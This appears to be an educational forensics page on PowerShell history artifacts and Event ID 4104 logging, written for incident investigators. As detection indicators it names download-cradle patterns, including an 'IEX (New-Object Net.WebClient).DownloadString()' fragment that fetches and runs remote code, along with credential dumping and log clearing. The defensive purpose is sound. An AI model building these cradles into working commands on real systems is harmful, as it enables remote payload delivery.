PowerShell History
PowerShell is the preferred weapon platform of modern adversaries and red teams because it provides deep system access through a framework that is natively signed by Microsoft. The command history files it leaves behind are among the most actionable artifacts an investigator will ever parse. A single history file can expose an attacker's entire intrusion playbook — every download, every lateral movement command and every attempt to cover their tracks.
Every time you use a calculator app, imagine it secretly writes every calculation you typed into a notepad stored in a specific folder. PowerShell does exactly this. Every command an attacker types into PowerShell gets automatically saved into a plain text file. Investigators find this file and read the entire conversation between the attacker and the machine line by line.
General
PowerShell maintains its command history through the PSReadLine module which is enabled by default in all modern installations. This module writes each command to a plain text file called ConsoleHost_history.txt located at %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\. The key advantage for investigators is that this file is intentionally readable and requires no special parsing. It is a sequential log of commands typed in interactive sessions. In addition to this file, advanced logging via Script Block Logging and Transcription writes PowerShell execution details into the Windows Event Log under the operational PowerShell channel capturing even obfuscated and encoded commands after they have been decoded by the engine.
Traces
PowerShell leaves evidence in two primary locations. Here are the top artifacts and data points we prioritize:
- Command Text: The verbatim commands typed by the user or injected by a script, stored in
ConsoleHost_history.txt. - Script Block Content: The decoded, runtime-deobfuscated content of every script block recorded by Event ID 4104.
- Execution Timestamps: The file modification date of the history file and the event log timestamps provide a timeline of activity.
- Download Cradles: Incriminating one-liners like
Invoke-WebRequestorIEX (New-Object Net.WebClient).DownloadString()that prove remote payload delivery. - Module Loading: Names of every imported module or snap-in used during the session.
- and more.
Forensic Value
We analyze PowerShell artifacts to expose attacker tradecraft at its most technical level:
- Payload Delivery: Finding download cradle commands that fetched a remote malware stage. Match these with PowerShell EventLogs (Event ID 4104) to expose decoded script blocks.
- Living-off-the-Land: Identifying the use of built-in PowerShell commands to perform reconnaissance or dump credentials.
- Persistence Mechanisms: Uncovering scheduled tasks or registry run-keys created via PowerShell to maintain attacker access.
- Anti-Forensics Detection: Identifying commands used to delete event logs, clear the history file or uninstall security software.
For more Info check out these Articles: PowerShell EventLogs